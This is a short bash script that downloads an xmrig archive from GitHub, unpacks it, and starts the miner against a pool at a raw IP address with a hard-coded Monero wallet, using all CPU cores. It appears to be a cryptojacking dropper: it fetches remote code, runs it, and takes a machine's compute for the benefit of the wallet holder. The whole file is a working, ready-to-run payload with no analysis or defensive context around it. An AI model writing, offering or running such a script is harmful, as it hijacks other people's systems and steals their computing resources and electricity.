#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz
./xmrig --donate-level 1 -o 172.104.40.210:443 -u 4Q4aKkiGsHnKSN6L4AsiUqcgLYKRgRkYmLphHDn4jf7xYKmFuVWC2LGZdNP5yVnPrxKU2qTsJZesRMJXiTrENXhULVM6ws6 -p tes -a rx/0 -t $(nproc --all)
